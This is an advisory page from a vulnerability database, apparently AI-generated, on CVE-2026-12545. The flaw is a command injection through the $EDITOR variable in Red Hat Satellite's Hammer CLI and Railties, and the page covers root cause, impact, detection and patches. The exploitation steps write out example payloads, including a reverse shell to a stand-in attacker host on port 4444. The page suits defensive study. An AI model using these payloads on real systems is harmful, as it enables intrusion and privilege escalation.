
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-12545 is a command injection vulnerability in rubygem-hammer_cli (Hammer CLI) and the Railties (Ruby on Rails) component distributed with Red Hat Satellite. The flaw arises from insecure interpolation of the $EDITOR environment variable into Ruby's system() method, allowing shell metacharacters (e.g., ;, |, &) to be interpreted by /bin/sh. It was reported on June 17, 2026, and patches were published on October 1, 2026. Affected products include rubygem-hammer_cli versions prior to 3.12.0-2.el8sat, 3.12.0-2.el9sat, 3.14.0-2.el9sat, 3.16.0-2.el9sat, and 3.18.0-2.el9sat, as shipped with Red Hat Satellite 6.16–6.19. It carries a CVSS v3.1 base score of 6.7 (Medium/High) (Red Hat CVE, GitHub Advisory).
The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). In lib/hammer_cli/utils.rb, the open_in_editor method executes system("#{ENV['EDITOR'] || 'vi'} #{f.path}"), passing a single interpolated string to system(), which causes Ruby to invoke /bin/sh -c and interpret any shell metacharacters embedded in the $EDITOR value. The same pattern exists in railties-7.0.10/lib/rails/commands/encrypted/encrypted_command.rb and secrets_command.rb. Exploitation requires local access, low privileges, and user interaction (e.g., triggering an editor invocation), making the attack complexity high. The Railties version in use (7.0.10) is End-of-Life and will not receive upstream patches, requiring manual remediation (Red Hat Bugzilla, Red Hat CVE).
Successful exploitation allows a local attacker with low privileges to execute arbitrary OS commands within the Hammer CLI process's effective security context, resulting in high confidentiality, integrity, and availability impact. If Hammer CLI is invoked with elevated permissions (e.g., via sudo with environment preservation), exploitation can lead to full root-level privilege escalation. Malicious activities executed through this vector may appear to originate from the application itself, complicating forensic attribution (Red Hat CVE, Red Hat Bugzilla).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the disclosure date (Red Hat CVE). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The EPSS score is approximately 0.505%, indicating a low probability of exploitation in the near term. The attack is not automatable (per NVD SSVC assessment) due to the requirement for local access and user interaction (GitHub Advisory).
rubygem-hammer_cli installed).open_in_editor method (e.g., commands that open a file for interactive editing).$EDITOR value: Set the $EDITOR environment variable to a payload containing shell metacharacters, such as EDITOR='vi; id > /tmp/pwned' or EDITOR='vi | /bin/bash -i >& /dev/tcp/attacker/4444 0>&1'.open_in_editor, causing system("#{ENV['EDITOR'] || 'vi'} #{f.path}") to be evaluated with the malicious $EDITOR value.sudo -E, this results in root-level command execution (Red Hat Bugzilla, Red Hat CVE)./bin/sh, /bin/bash, curl, wget, nc) with unusual arguments or network connections./tmp/) by the Hammer CLI process; new cron jobs or SSH authorized keys added by the Satellite service account./var/log/audit/audit.log) showing system() calls with unusual $EDITOR values containing metacharacters (;, |, &); auditd records of unexpected execve syscalls from the Hammer CLI process.$EDITOR environment variable containing shell metacharacters in process environment listings (/proc/<pid>/environ).Red Hat has released patched versions of rubygem-hammer_cli across multiple Satellite releases: 3.12.0-2.el8sat / 3.12.0-2.el9sat (Satellite 6.16), 3.14.0-2.el9sat (Satellite 6.17), 3.16.0-2.el9sat (Satellite 6.18), and 3.18.0-2.el9sat (Satellite 6.19), delivered via RHSA-2026:74503, RHSA-2026:74504, RHSA-2026:74505, and RHSA-2026:74506. Red Hat notes that no configuration-based mitigation meeting their deployment criteria is available; upgrading to a patched package is the recommended remediation. As a defensive measure, administrators should restrict or sanitize the $EDITOR environment variable, avoid running Hammer CLI with sudo -E, and consider replacing system() string interpolation with array-based argument passing in custom scripts (Red Hat Errata RHSA-2026:74503, Red Hat Errata RHSA-2026:74504, Red Hat CVE).
The vulnerability was discovered internally by Laura Pardo and Toni Gornals of Red Hat, and was disclosed as part of a broader Satellite security update addressing multiple command injection and privilege escalation issues. No notable external researcher commentary or significant social media discussion has been identified beyond standard CVE tracking and aggregator coverage (Red Hat CVE).
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."